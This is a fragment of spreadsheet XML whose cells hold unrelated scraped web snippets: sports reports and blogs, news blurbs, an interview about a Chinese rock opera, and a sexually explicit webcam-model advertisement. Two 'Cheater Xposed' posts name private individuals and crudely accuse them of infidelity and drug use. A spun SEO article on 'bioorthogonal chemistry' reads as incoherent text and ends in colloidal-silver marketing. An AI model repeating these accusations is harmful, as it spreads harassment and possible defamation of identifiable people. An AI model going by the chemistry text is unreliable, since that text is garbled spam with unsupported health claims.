    <t>My Kinks: oil Webcam profile: My showMy show is always live and full of fun and sensuality! I love to undress, play, talk dirty and take both of us to an incredible climax ;-)There are many things that excite me, and I would love to discover what excites you too!Are you at home, at work, hiding from the wife or just hot as hell? Do you like a friendly but dirty girl, who seems innocent and reserved until you know her and see the dirty mind she has?Things I enjoy doing in my showsStripteaseFingeringPlaying with my toysAnal with fingers or toysTalking dirty and moaningDouble penetration with fingers or dildos.Stuffed with panties in my wet pussy :)Modeling heels, stockings or sexy outfits for youCam2camShows with my vibes and my toys or fingers!Foot fetishRole playing gameOther fetishes but ask for details :)Talking and having interesting conversations! I love smart guys! :)Can’t you see what you want? Do not be afraid to ask! ;)EXPERTISE° Blow jobs° Careless bjs° Deep throat° Masturbation° deep penetration° anal° Double penetration° Executing your requests° Lingerie° Toys° Heels° Stockings° Foot Fetish° Spanking° oil° And many other things that will make you cry for yourself: PCan’t you see what you want? Do not be afraid to ask! ;)DO YOU WANT TO SEE MORE ABOUT ME?Interested in a video or photo? I have several of them or I would love to make a custom video / photo set for you.Custom videos start at $ 3 / min and a minimum of 5 minutes. Ask me about custom photo sets. Some applications may cost more!See you soon for a fun and sexy time!THINGS I DON’T DO:Anything that has to do with the BROWN fetish … also known as fecal materialSomething to do with animalsAnything with a minor. I will NOT play the role of someone under age.I will not hit anything harmful inside me (curling iron, animals, etc.)NO PREVIEW FREEJust put. NOTHING illegal :)**** I am a verified model, so IT IS NOT A PREVIEW LIVE ****.* I ONLY ACCEPT PAYMENTS THROUGH XLOVECAM. I WILL NOT ACCEPT PAYPAL, GOOGLE WALLET, AMAZON GIFT CARD OR ANY OTHER PAYMENT METHOD * Favourite sex position: ask me What I do in my amateur show: cam2cam What I don’t like: impolite people Gallery</t>
  </si>
  <si>
    <t>Virginia Credit Repair | (888) 630-5917 Virginia Free Credit Repair Counseling call (888) 630-5917 remove bankruptcy, free consumer report, fix bad credit, check your annual Equifax, TransUnion, Experian credit report. University post office manager retires after 22 yearsMike Sperlazza speaks with a writer from The... Monday 07 October 2019 09:14 AM UTC-05 University post office manager retires after 22 years Mike Sperlazza speaks with a writer from The Sunflower during his retirement celebration on Oct. 4 in the Rhatigan Student Center. Sperlazza was the …</t>
  </si>
  <si>
    <t>Melbourne City got its transfer business done early, and that's why it looked sharper than Victory.</t>
  </si>
  <si>
    <t>Patrick Bell</t>
  </si>
  <si>
    <t>Regional Express threatens to scrap flights or reduce their frequency on its popular route from Sydney to Dubbo due to a dispute over increased airport fees.</t>
  </si>
  <si>
    <t>Flaming liar. Via Free Beacon: Washington Post fact-checker Glenn Kessler gave Rep. Adam Schiff (D., Calif.) four Pinocchios for falsely claiming the House Intelligence Committee had not heard from the Ukraine whistleblower. During a September interview on MSNBC’s Morning Joe, Schiff said the committee, which he chairs, had not spoken directly with the whistleblower prior […]</t>
  </si>
  <si>
    <t>A huge win for Newcastle United and a dream Premier League debut for Matty Longstaff, who inspired us to our first three points of the season at St James’ Park with a second half winner in front of the Gallowgate! It was an intriguing and fresh line up picked by Steve Bruce today, full of pace with Saint-Maximin and Yedlin returning, and of course Matty Longstaff making his debut alongside his brother in central midfield – and they were all brilliant. I’ve knocked Bruce – and rightly so at times – but his tactics were much better today. We looked very hard to break down at the back (albeit against a VERY poor Man Utd side), competed much better in midfield and had more purpose about us on the counter-attack, with Saint-Maximin’s return playing a huge part in that. It was nearly a blistering start, Saint Maximin put Almiron in but he couldn’t get the ball across onto his left foot and his right foot cross was intercepted. The energy and commitment levels from the players were a far cry from last week and Saint Maximin has the crowd on their feet every time he got the ball, despite a lack of end product at times. There was also nearly a wonderful moment when Matty Longstaff hit the bar with a brilliant 25 yard half volley. Ultimately though the same problems in attack existed with clear cut chances few and far between and in truth, we never looked like creating anything against the poorest Manchester United team in my lifetime. Despite them having just over 70% of the ball in the first half we were the better team and were unlucky to not be winning at half time, despite Maguire missing an absolute sitter on the stroke of half time. The second half started without quite the same gusto from us, with Manchester United seemingly having much more time on the ball. Carroll came on for Joelinton on 56 mins after another ineffective and frustrating appearance from the Brazilian, who in fairness was suffering from a back injury. Then a moment that will live long in the memory… Jetro Willems broke free down the left, and just when it looked like the attack would break down, he rolled the ball back to Matty Longstaff who struck a brilliant low drive into the bottom corner. HE'S ONE OF OUR OWN!! #NUFC pic.twitter.com/YQwCL9sljM— NUFCblog.co.uk (@NUFCblogcouk) October 6, 2019 It lifted the roof off the stadium and injected energy and belief at a time when Man Utd were starting to get a grip on proceedings. It was a relatively comfortable ending to the game in fairness, with Man Utd failing to break down our stubborn defence. A brilliant win that takes us up into 16th. Bring on Chelsea! (Fancy writing for us? Get in touch at NUFCblogsubmissions@gmail.com &amp; we’ll get back to you!)</t>
  </si>
  <si>
    <t>All of Pennsylvania, Aliquippa should know about this s**t, Casey Larson, a nasty b***h who dropped onto a married c**k like she was a pigeon looking for a windscreen. She slept with a married cheater when he was away from home and working for his family. Caught him at a weak moment in his relationship and put the nastiness on him, stained him for the wife, who later caught an itch and had to get over it with medicine. She knocked his boots and moved on, got knocked up and is always looking for her next knocker with a c**k. A nasty tart who will shat on you and your family, then fly away and look for a new place to shat. Casey Larson is hoe. The post Casey Larson — Aliquippa, Pennsylvania appeared first on Cheater Xposed - Cheater Exposed USA.</t>
  </si>
  <si>
    <t>Anti-government protesters faced off against authorities in Hong Kong on October 13, vandalizing shops and shouting slogans at police. Sunday’s demonstrations, described by local media as “flash mob protests,” come as the city enters its 19th consecutive week of political unrest. This footage shows damage to Bank of China and Best Mart 360° outlets in in New Town Plaza. “F**k CCP [Communist Party of China]” has been scrawled across the entrance to the bank. Mass protests in Hong Kong started in March over a now-shelved extradition bill that would have allowed people to be sent to mainland China for trial. The protests have broadened, with hundreds of thousands of people participating in multiple rallies, most recently about a new law banning face masks at protests. Credit: SocREC via Storyful</t>
  </si>
  <si>
    <t>Sarah Williamson</t>
  </si>
  <si>
    <t>A Tayside university is flying in the face of student stereotypes by launching a series of “SOBAH” events to cater for student demand.</t>
  </si>
  <si>
    <t>A rescue operation is underway in Victoria’s alpine region following a car crash.Emergency services were called to Mitchell’s Track in Mount Buller about 11.55am following reports two males were trapped in a vehicle.</t>
  </si>
  <si>
    <t>In a brand new show titled ‘Yeah, I said it’, we talk about some burning topics surrounding the Pittsburgh Steelers. The Pittsburgh Steelers finally won a game, and fans are back on the bandwagon and showing some excitement about the Week 5 game vs. the Baltimore Ravens. Some are thinking the Steelers have turned the corner. But, that might not be the case. This is where the newest BTSC podcast “Yeah, I Said It” comes in. My co-host on ‘The Standard is the Standard’, Lance Williams tells fans why the recipe for success doesn’t have to be complicated. Time to deliver the goods on the latest show. If you haven’t heard, we have a YouTube channel, and the main reason for this is to increase the sound quality on our shows. But if you’re a visual learner you can watch the show below. Be sure to subscribe to our channel! Check out the audio below: Feel free to give us your thoughts on the topic in the comment section below, and don’t forget to follow us on all our audio platforms by following the links below: Apple Users: CLICK HERE Spotify: CLICK HERE Google Play: CLICK HERE</t>
  </si>
  <si>
    <t>CALGARY – The Alberta government is joining a class-action lawsuit to recoup health-care costs related to the opioid crisis, the province’s health minister said Tuesday. Tyler Shandro said there were almost 800 fatal overdoses and 4,200 emergency calls related to… The post Another province joins class action lawsuit against opioid manufacturers, distributors appeared first on Canadian Underwriter.</t>
  </si>
  <si>
    <t>Man City 2-0 Dinamo Zagreb: Report, Ratings &amp; Reaction as Raheem Sterling Helps Citizens to Win Original Source Manchester City defeated Dinamo Zagreb 2-0 on Tuesday, on a night where the hosts dominated possession at the Etihad Stadium but their attack struggled to click into gear. City dominated the first half but were uncharacteristically wasteful. The half-time numbers said it all: 79% possession and eight shots but just one on target – the same number recorded by their opponents. The second half continued in the same vein until Raheem Sterling’s 56th-minute introduction. Within ten minutes he had given City the lead, slotting in after a high-tempo passing move that pulled Dinamo’s defence apart. There was an air of deja vu as Riyad Mahrez slotted across the face of goal and Sterling tapped home. City sealed the victory in the last minute of stoppage time, as Phil Foden slotted home to finish off a counter attack with the Croatian side looking ragged. Here’s 90min’s breakdown of the game below. Manchester City Key Talking Point Much of the pre-match narrative had been about goals and, more specifically, how many City could put past their Croatian opponents. While Dinamo shocked Atalanta with four goals on matchday 1, Pep Guardiola’s side put on a show with their 6-0 demolition of Shakhtar Donetsk. Perhaps that’s what Pep meant when he spoke of the need to ‘seduce’ the fans with their Champions League performances? However, there was a collective sigh when the team news revealed City would be without one of their most potent footballing aphrodisiacs. Creative influence Kevin de Bruyne would miss the fixture with a groin injury. The first-half problem wasn’t creating chances after all, it was taking them. City swarmed forward in numbers and played some slick passing football in the process, but they just didn’t seem to have their usual attacking swagger. Bernardo Silva and David Silva missed their most gilt-edged chances. Not had 25 minutes at the Etihad and it could be 5-0. Aguero, Bernardo (twice) and Silva have all missed decent chances. Gundogan has hit the bar. — Rob Dawson (@RobDawsonESPN) October 1, 2019 Man City have had 6 great chances….but still zero zero — Jan Aage Fjortoft ️‍  (@JanAageFjortoft) October 1, 2019 Raheem Sterling improved City immediately once he came on, playing a part in three chances before he capped off a fantastic passing move with the opening goal. Guardiola’s team were crying out for someone to be a little more direct against a rigid back five and Sterling gladly obliged. It wasn’t until the England international started running at them that Dinamo lost their defensive shape. City continued to dominate without creating and Foden’s goal might mask the fact that they weren’t at their attacking best. Ultimately, Guardiola will be disappointed they didn’t make more of their dominance on a night they recorded 81% possession. Player Ratings Starting XI: Ederson (6); Cancelo (7), Otamendi (7), Fernandinho (7) Mendy (8); Gündogan (7), Rodri (8*), D Silva (6); Mahrez (7), Agüero (7), B Silva (6) Substitutes: Sterling (8), Jesus (5), Foden (7) STAR MAN: Rodri City no longer look like they’d be derailed by losing Fernandinho as their midfield pivot, which is possibly the biggest compliment you could pay Rodri. The best of the Spaniard was there for all to see against Dinamo. He was box to box, but you hardly noticed him breaking into a sprint – instead he could be spotted gliding around the pitch or simply popping up in the perfect position. Minor detail there. Fernandinho went into DM to win the header from a long ball forward while Rodri dropped into CB. Interesting (to me at least) — Sam Lee (@SamLee) October 1, 2019 From a defensive perspective, he plugged gaps that enabled Benjamin Mendy to drive forward at will and also stepped in to let his centre halves carry the ball out. His height was cited as a plus when he arrived and he used it on a couple of occasions to combat Dinamo balls over the top. When City transitioned from defence to attack, Rodri tried to release the ball early and slip it through the opponent’s well-drilled back five. It would have paid off a couple of times, if City had their shooting boots on. He was rewarded when his sublime pass through to Mahrez allowed the Algerian to set up Sterling. Awesome Man City goal. So much to enjoy about it – love seeing Sterling playing centrally &amp; poaching, but the ball from Rodri to Mahrez was delicious.  — Tom Campbell (@UtterlyTC) October 1, 2019 City are ahead with a beautifully worked team goal. Mahrez to Gundogan to Rodri to Mahrez to substitute Sterling to slide in to score on the goalline. (That lad can’t stop scoring). They’re making that sort of goal look routine now. It was anything but #mcfc — James Ducker (@TelegraphDucker) October 1, 2019 It wasn’t just his own game that impressed, his presence allowed others to flourish. Ilkay Gundogan was often criticised for not being Fernandinho last season, but looked much better with more licence to roam. While Rodri seemed to have an almost-telepathic understanding of where Benjamin Mendy would be, setting him free numerous times. Dinamo Zagreb Player Ratings Starting XI: Livakovic (6); Stojanovic (6), Théophile-Catherine (7), Dilaver (7), Peric (6), Leovac (7); Moro (6), Ademi (6), Olmo (7*); Orsic (6), Petkovic (6) Substitutes: Gojak (6), Gavranovic (5), Atiemwen (5) Looking Ahead City’s home fixture with Wolves is followed by an away trip to Crystal Palace’s Selhurst Park, before Atalanta visit the Etihad Stadium in the Champions League. Meanwhile, Dinamo face Slaven Belupo and HNK Gorica in league action, before Shakhtar Donestk visit Zagreb in the next round of European action.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Man City 2-0 Dinamo Zagreb: Report, Ratings &amp; Reaction as Raheem Sterling Helps Citizens to Win appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>Accused pervert James Franco’s now-defunct film school doubled as a hunting ground for the Oscar winner and his pals to prey on young aspiring actresses, according to a sexual harassment lawsuit filed on Thursday.</t>
  </si>
  <si>
    <t>Steven Turco – Dallas, Texas Can you find the five things that are different in these two pictures of the same man? We’ll give you the first one, don’t cheat, see if you can find four or five others. Good luck, and remember kids, don’t be a dope, stay in school and don’t start hitting the meth pipe. 1) One hat is white and the other one black. The post Steven Turco – Dallas, Texas appeared first on Expose Homewreckers. The post Steven Turco – Dallas, Texas appeared first on Cheater Xposed - Cheater Exposed USA.</t>
  </si>
  <si>
    <t>Kate Stephens And Jacqueline Lynch</t>
  </si>
  <si>
    <t>Low-cost airline Jetstar announces it will start running three flights a week between Melbourne and Busselton in the south-west of WA.</t>
  </si>
  <si>
    <t>The Mag was the first publication to give Newcastle United fans the chance to express themselves, the paper version launched in August 1988. Now 31 years later, it feels like...The Mag was the first publication to give Newcastle United fans the chance to express themselves, the paper version launched in August 1988. Now 31 years later, it feels like... You can click here to read the full article. The post Newcastle United fans – Views and opinions plus welcome to Toon City appeared first on NUFC The Mag.</t>
  </si>
  <si>
    <t>juiciness</t>
  </si>
  <si>
    <t>GoPro Hero 7 White delivered for $219. However, the new 8 line should be announced very soon.</t>
  </si>
  <si>
    <t>Allan Cho</t>
  </si>
  <si>
    <t>Son of James’ front man Shon Wong classifies their unique sound as “Chyna-Trucker-Funk”. “It blends the haunting sounds of Chinese instrumentation with the soulful sounds of Southern Rock and funk,” Shon describes. At first glance, Shon Wong embodies a type of “bad ass” akin to muscle action stars and hard rockers in the ‘80s. His bomber jacket, aviators, and biker beard speaks volumes with the image he projects when I met Shon during his table read at Scripting Aloud. Tale of The Eastside Lantern is a Rock Opera that combines urban romance, a whodunit mystery, with the tradition of Cantonese Opera and the grizzled melancholy delivered by Son of James. While there is a workshop presentation on October 31st at the CBC Studio for The Heart of the City Festival, we got a first look at the script in progress. Origins Vincent Ternida (VT): When did you come up with the idea? Shon Wong (SW): I would say eight years ago, I was inspired by my grandfather. Being in a family of Chinese Opera Actors, I felt that as I got on with the years, I’ve always wanted to incorporate Chinese Opera in my work. Through that process, I participated in a couple of Chinese operas. I got first-hand knowledge of the makeup, how the staging works, I volunteered with the Vancouver Cantonese Opera. I started learning how to do the makeup. I learned what their stories are about. I became an extra in one of their productions. That’s why I kept in contact with Rose Chang, the woman in the poster. So I always tell her, I got this great idea for a Chinese Rock Opera. We would always go back and forth, always keep in touch. She’ll attest to this—Chinese Opera is dying. People like my grandfather are dying. They’re the only ones who appreciate it. That audience is dying, the art is dying. In a way, this is my way of paying homage to it. This is showcasing it, I want to give the audience a taste of Chinese Opera without having sit through a whole production. VT: Despite it being a dying art form, I find it ambitious at the same time honorable taking your heritage. And what you said, you were the grandson of an opera family. With that heritage, you’re moving on, you’re adding on with your style as well. Nowadays, Rock is— SW: Rock is dead! When’s the last time you heard a guitar on the radio? They’re who I grew up with— Guns and Roses, Def Lepard, Pink Floyd, Metallica, the usual suspects. You don’t get music like that anymore. Who wants to listen to their new material? If I go see Guns and Roses, I don’t wanna hear all their new shit. Van Halen tried to do that and it sucked. I believe that bands only have so much music in you before you become a cliché. You have a sound that’s distinct, doesn’t matter what you do, any song right now is gonna be that sound. VT: When you volunteered for the opera, did Chyna-Trucker-Funk came before or after? SW: It probably came in the last year. We’ve been together as a band for two years, a lot of moving members. I’ve always had a solid four people: my horn player, chinese harp player, and bass player. The four of us, we’ve been the nucleus of it all. In the last year we’ve become better at it. We found our groove: A lot of our sound is really cool now. VT: Are you gonna record the soundtrack to Eastside Lantern? SW: For sure. A lot of songs from the East Side Lantern we’ve been playing for years. That’s what it was, we fit the story with the lyrics of the songs. It’s been a cool process—we really want to be a bad ass Chinese production. Writing Process VT: Did you have a deadline for this project? SW: We had a deadline, knowing that Oct 31st is the presentation. So I set a monthly deadline for myself. God bless Savannah (Shon’s dramaturge from the Vancouver Moving Theatre). She’d give me feedback and ask me specific questions like “Why does this matter for this person? Why does the audience need to know that? Would the person from the Chinese Opera era talk like this?” We get into the headspace of these characters. VT: As a first time writer, how did you find that challenge? SW: In writing songs, I’m used to rewrites and editing. It was an easy transition. I’m used to putting things together, writing songs. If we have something and it doesn’t work, scrap it and start again. When Rick [Tae] gave me feedback, he really encouraged me to go deeper and get wider. One of his emails is writing is rewriting. VT: How did that process go? SW: When we had the script, I became confident enough to find a director. A couple of people’s names came up, Rick was one of them. And then Andy [Toth]. Rick had been recommended highly. Being Chinese, he’d be a perfect fit. I sent it to him first. He’s totally gonna say yes because at the time, I had the best script ever. (laughter) He emails me back saying it’s cool, but I got a lot of questions for you, man. (laughter) He was kind enough to ask these questions to have the story make sense. In the first draft, a lot of my writing is expository. As a first time writer, I didn’t know what that meant. I looked it up and learned what expository meant. It took another month to rewrite the script. I sent it back to Rick and he gave me glowing feedback. He said, “Shon, this is ten times better.” I asked him if he’s into doing [the production] and he said, “As a director, I’d love to do it as a finished product. But you’re on the right track, the changes you made are brilliant.” After he said no, I contacted Andy. Thankfully he read the new draft. (laughs) VT: What was the timeline between drafts, from first draft (the one you sent to Rick) and the current draft? SW: When I contacted Rick, it was a couple of months ago. I took a month for rewrites. And then the past month, I sent it to Andy who was doing the Fringe Festival. A week before Scripting Aloud, Andy and I met and agreed to the project. The universe came together at the right time. [Scripting Aloud] was so helpful. Savannah and I, we thought it was okay but we still had our doubts about a lot of things. It was nice to hear that, all the jokes landed, people got the humor, and they got the comparisons and the undertones. Future of Eastside Lantern VT: How would this performance on Oct 31st go? Will it work like Scripting Aloud where you perform the play? SW: It’s a workshop presentation, there’ll be movement, there’ll be a script at hand. I don’t have the full budget for a full production yet. I like it that we’re taking baby steps, now we’re gonna put it on stage. It’ll be a bigger version of Scripting Aloud. We’ll have the audience give back feedback. It’d be nice to see what they like and don’t like. Did we catch your attention, did they care about the characters? I’m really enjoying the process. As I was telling Andy, “Don’t be afraid to tell me what to do. I got no ego, my friend.” I told him straight up that I enjoy this. I enjoy the work. If you don’t like something, I will redo it. I showed him that this will be a good working relationship. I told him off the bat, I work for you. I need his expertise at this point, I’m only carrying [this project] as far as I can carry it. Now I need experts. VT: What’s next for Son of James? SW: Now that we’re hitting up our stride as a band, come the next week, I’ll be applying to musical festivals. Last July, we played the Vancouver Folk Fest. That was our first major music festival and Vancouver Folk Fest gave us a glowing recommendation to other festivals. The challenge is [navigating these festivals] as my members have day jobs. We’ll pick up some festivals here and there, like the Folk Fest and Vancouver Island. In today’s world everybody’s got day jobs and families. It’s not like we’re all eighteen and nineteen and nothing to do. We’re like late life rock stars. We threw Roxy’s first Chinese New Year party. I think thats gotta be something to be proud of. In 30 years, they’ve never had a CNY party. They had a Chinese Elvis. We had line dancers and Chinese country music. People were enjoying themselves. Roxy wants to do it every year now. I don’t think there’s no space for the Chinese in this town. We got nothing but love from people. We played the Roxy three times. There’s tons of room for us. We just gotta get over that we’re inferior. People want us to do our thing. If you got something cool and authentic and it’s coming from a sincere place: People feel that. I got nothing but a positive experience, and here to do my part; to show people what Vancouver really is about. Catch Shon at the CBC Studio on October 31st for the workshop presentation of The Tale of the Eastside Lantern at 12pm. Scripting Aloud meets every 3rd Monday of the month at Sun Wah Centre. Vincent Ternida’s works have appeared on Ricepaper Magazine, Dark Helix Press, and was long listed for the CBC Short Fiction Prize. The Seven Muses of Harry Salcedo is Ternida’s first novella. He has a collection of short stories in development, adapting his novella into a screenplay, and interviews other writers for fun and profit. He lives in Vancouver, British Columbia.</t>
  </si>
  <si>
    <t>The previews are in from ITV for next week’s Corrie and Yasmeen and Shona tries to contact Max but...</t>
  </si>
  <si>
    <t>James Boyer</t>
  </si>
  <si>
    <t>Photo by Daniel Shirey/Getty Images Oh, you haven’t heard yet? Mason Rudolph is incapable of throwing deep! NFL pundits — and sport’s analysts, in general — are the most reactionary commentators you will ever find. I get it. They have to write an article or talk about a sport nearly every day, so, of course, they need to keep it interesting, as well as new and fresh. It would be a pretty boring sport’s page or talk show without new spins every week. Understood. But, that doesn’t make it any less grating, at times. Last week’s weekly Steelers Hysteria was concentrated on the defense. As someone who listens to or reads NFL commentary from traditional to the in vogue world of fantasy football, the ponderous refrain was that the Steelers’ defense was hot garbage. With very few exceptions, this opinion was hardened in cement. I heard the word “stinks” and that starting your slot receiver in fantasy versus the Steelers was a mortal lock. The crowned prince to destroy the Steelers this week was Bengals wide receiver John Ross. Oh, no! Hide the children! So it is written, so it shall be done — Andy Dalton and their top five passing attach will destroy the Steelers’ pathetic defense. Start them all in fantasy. Andy Dalton, John Ross, and Tyler Boyd were sure things. Oh, and Joe Mixon? Start him, too, against this defensive sieve. Never mind that the Steelers’ defense boasted 10 number one draft choices. And, that many of these high picks already had a nice NFL pedigree. Cam Heyward, Stephon Tuitt, TJ Watt, Minkah Fitzpatrick, and Joe Haden. Forget that the defense was being acclimated to a highly touted number one pick at ILB in Devin Bush. Further forget that this defense was thought of as a potential excellent unit mere weeks earlier. The NFL punditry world sure forgot and quick. They trashed that prediction. This unit was bad and will continue to be roasted. Then Sunday came and none of that happened. The Steelers, in fact, put on one of the most complete dominations on the defensive side of the ball of any game this season, and against what was rated a top offense that gave the 49ers, the Bills, and the Seahawks fits. “Oh, but that’s only because the Cincinnati line was so bad.” Or, “That’s just Dalton failing again in primetime.” Yeah, whatever. Blah, blah, blah. It’s hard to admit sometimes when you’re so terribly wrong. That fact is that this type overreaction is abundant in the NFL and all sports. A few bad weeks, especially at the beginning of the season, often causes typecasting that will stick for a while with the “experts.” Of course, time will tell. But, suddenly the season outlook on the Steelers’ defense looks rather promising. One this is for sure — the overblown death of the Steelers’ defense was hysteria. So, what is the pounding drumbeat of Steelers Hysteria this week? Oh, dear Lord, Mason Rudolph and the Steelers cannot throw beyond three yards! Oh my, hide the children again! Similar to how the Steelers’ defense was thought highly of this preseason, so was the deep passing ability of Mason Rudolph. It was a pretty universal opinion that one of the strengths of Mason Rudolph, a strength that had the Steelers tag him a first round talent, was his ability to throw the long ball. In fact, it was spoken of ad nauseam that he and his college teammate, James Washington, were prolific when the ball travelled far downfield. ESPN’s Tim Hasselback proclaimed that he had Mason Rudolph ranked number one in his class — that would be ahead of Baker Mayfield and Sam Darnold — in the ability to throw long. Furthermore, two preseasons of Rudolph football at the NFL level gave no indication that he couldn’t throw beyond three yards. He often threw arcing deep passes, and often with success in his limited NFL experience. But, after two games, it has now been a laughable joke that Mason Rudolph can’t or won’t throw long, that he needs to be protected from himself, and that the Steelers’ offense will be run, run, run, and you had better get used to it. Yawn. In fantasy, forget Rudolph and the passing game, they say, because the Steelers think so badly of Rudolph’s passing ability that they are letting Jaylen Samuels play QB in the wildcat instead of trusting Rudolph to attempt passes. Rudolph’s DOT — depth of target, for you non-fantasy people — is astoundingly awful, so you must bench Ju Ju Smith-Schuster and run to the waiver wire to pick up the Steelers running backs. Okay, deep breaths. So, yes, the Steelers came out run-heavy versus the Cincinnati Bengals, and, yes, they did run the wildcat quite a bit. Did you notice anything else? Maybe that it was working! And, working very well. So, in the NFL, where it is not easy to just take wins for granted, you keep doing what works. It was a total humiliation and domination of the Cincinnati Bengals. When a plan is working to perfection, good coaches will ride that to the W. But, now the seed is sown, the cement is set, and NFL punditry has deemed that Mason Rudolph is a failure at long passing. This is the Steelers’ predicament for the foreseeable future. This is the weekly Steelers Hysteria of the moment. Of course, everything in life remains to be seen. But, Mason Rudolph, as explained above, has shown a proficiency at throwing deep. Even in the past two games, where he admittedly did not try it often, he has thrown a couple of long TDs. The passing game is a work in progress, but, still, Rudolph has thrown 2 TDs in every NFL game he has played. I predict that the Steelers’ game plan will change and highly doubt that the wildcat is the Steelers’ future. As Rudolph gets comfortable with his young receivers, I feel the deep shots are there. In fact, this notion that the Steelers will throw 3 yard passes every time and that they will run nearly every down will do just that — open up the field for deep passes, including play-action. I feel confident that Rudolph has the talent to deliver. Long and short. Deep passes are one thing, low percentage plays. We’ve seen him make them. But, I’m more pleased to see that he has been consistently able to deliver on short and intermediate throws with accuracy. While deep balls are nice and necessary, it is the higher percentage stuff that is the bread and butter in today’s NFL. Watch Tom Brady. This isn’t the long ball age of the Terry Bradshaw 1970s. But, don’t worry. If this hysteria dissipates as I think it will, a new Steelers Hysteria will surely percolate and bubble up to take its place. Oh, let me guess. Hmm…What’s wrong with Ju Ju? I can hear it now.</t>
  </si>
  <si>
    <t>The mother of one of two young horse riders who died in competition said it has taken the two tragic deaths to force change.</t>
  </si>
  <si>
    <t>Fremantle captain Nat Fyfe has won his third Doig Medal with a clear victory in the club's fairest and best count at a the Crown Ballroom on Saturday night.</t>
  </si>
  <si>
    <t>Trail Days! Days 44&amp;45 were a great couple of days off the trail to spend some time at Appalachian Trail Days in Damascus. Not as much video footage as I would have liked but it was a great time and sooo many people! Day 46 took us back to the trail and the 1/4 point […] The post Days 44-46 (Trail Days) – Appalachian Trail Thru Hike 2019 – Chilly Bin Hikes appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Who Else Wants to Learn About Bioorthogonal Chemistry? Yet, it may be better to use a scale that’s precise, even if it’s not accurate. The purest elements and chemicals can be seen on the periodic table, and many those listed can be seen in nature. If he doesn’t make many baskets, but always strikes the very same part of the rim, he’s got a high level of precision. Now, however, we’ve done it! It appears uniform throughout. They’re also called irreversible sols. New Ideas online dnp programs Into Bioorthogonal Chemistry Never Before Revealed In practice, QM programs do all this for us, and they’re getting quite fast. however, it can still take a lengthy moment. It is a difficult situation to calculate. We expect this work will result in new fundamental knowledge in addition to practical solutions to important biological issues. There’s nothing new in that. In science, the concept is comparable, but the definition is a lot narrower. I like the notion of attempting to bring people from chemistry, engineering and medicine along with the extensive purpose of improving human wellbeing. Details of Bioorthogonal Chemistry For the emulsion to remain stable, additional substances are required to stabilize https://chemistry.nd.edu/ the colloid. These are also referred to as colloidal dispersions because the substances continue being dispersed and don’t settle to the base of the container. Because a genuine silver colloid contains silver nanoparticles, not ions. The colloid particles are drawn toward water. These aggregated particles are called the micelles. Bioorthogonal Chemistry Explained This distinction is extremely important. If such is the situation, we can not be excessively laborious and painstaking to be able to eliminate error. A great case of a failure to use the definition of reliability correctly is offered by the cold fusion case of 1989. Try re-reading the previous paragraph, and see whether you can grab on the difference between the 2 terms. Great to see as much audience and good response! These proteins are rather massive molecules, meaning that they don’t readily pass through the cell membrane. Because plastics are produced with carbon, polymer chemistry a part of organic chemistry. These different kinds of mixtures are interesting but might not be essential knowledge for GCSE Chemistry. Colloidal solutions are extremely crucial in the health care field since they can be employed to manipulate blood conditions. They are very important in biology and medicine. The atomic mass of an element can be utilised to view how much of the element creates a mole. By way of example, CO is named carbon monoxide instead of carbon oxide. It is not hard to find that for the best effectiveness you need to find a item that has most of the silver content in the shape of nanoparticles not ions. It’s the mix of small particle dimensions and higher particle concentration that produces the utmost effectiveness for a colloidal silver product. And it doesn’t occur individually, only together with different kinds of carbon. Without such a carbon nucleus, life probably also wouldn’t have been possible. The Ultimate Bioorthogonal Chemistry Trick The solvent area of the solution is normally a liquid, but may be a gas. Although chemists have a hard time separating compounds in their particular elements, the different sections of a mixture can be readily separated by physical means, such as filtration. A standard use for hydrocolloids is in the invention of health care dressings. Normally, chromatography is done by placing a mixture of at least two chemicals into a glass column full of silica. A good example of this is going to be shaving cream. Rumors, Lies and Bioorthogonal Chemistry If these species are made in a cyclic conjugated system, it’s possible they can add to the formation of a Huckel aromatic compound, which provides the molecule added stability and distinctive reactivity. Both elements and compounds are called pure substances since they contain only one kind of molecule. This is because of the polar nature of the O-H bonds which may cause the formation of hydrogen bonds within precisely the same molecule. In order to work, the good material must first dissolve and break up in the ions which make up the compound. Hence they can’t dissolve polar compounds. The Characteristics of Bioorthogonal Chemistry However, some designers might have concerns about the potential health effects of some chemical ingredients utilized in everyday products. What a amazing line of speakers! The item development timeline has to be synchronized with sales and marketing and advertising departments and with manufacturing efforts. This is merely a sample of the clear-cut explanations readily available on our site to our members. What a fantastic and inspiring meeting with superior speakers and posters! Colloidal system is composed of Dispersed phase and Dispersion medium. Temperature affects not just the viscosity, but in addition interfacial tension in the instance of non-ionic surfactants or more generally interactions forces within the system. Emulsions are prepared by vigorously shaking both constituent liquids with each other, sometimes with the usage of surfactants like soap so as to help emulsify and stabilize the product formed here. Maintaining the appropriate pressure guarantees that the body tissues maintain the correct heights of liquid and that too much liquid doesn’t escape from the capillaries. Bioorthogonal Chemistry Help! Thus, although precision and accuracy are occasionally used interchangeably in the true world, they are extremely different when speaking about measurements in chemistry. Neoprene finds its way into several of the products we rely on daily. We’ve done our very best to check the accuracy and quote the appropriate sources. You can imagine accuracy and precision with respect to hitting a bullseye. We’re sure that you understand quite a bit about those solutions. Silver Hydrosol is still another name for ionic silver. Order your Mesosilver today and begin getting the benefits only a real colloidal silver can offer. The reaction was proven to fulfill a number of the demands of bioorthogonality, but no process of incorporating the QC functionality into a biomolecule of interest was demonstrated. Give a single instance of each type. Such a colloidal process is called a elaborate disperse system, or CDS. It supplies the closeness of information in a dataset. This is because of the mechanism of this sort of bond. Individually these bonds are extremely weak, although taken in a large enough quantity, the outcome is powerful enough to hold molecules together or inside a three-dimensional form.</t>
  </si>
  <si>
    <t>The Magpies are in disarray at the moment and the bookmakers don’t expect them to recover This post written by Lee Ryder originally appeared on ChronicleLive - Newcastle United FC. Read the full post here. Source</t>
  </si>
  <si>
    <t>THE Gold Coast is at the peak of its worst flu season in five years.</t>
  </si>
  <si>
    <t>LEGACIES season 2 starts next week on The CW. Fans of The Originals will be pleased to hear that one of the show’s characters will make a one-off appearance in the new series of Legacies. Daily Express :: TV and Radio Feed</t>
  </si>
  <si>
    <t>batrarobin</t>
  </si>
  <si>
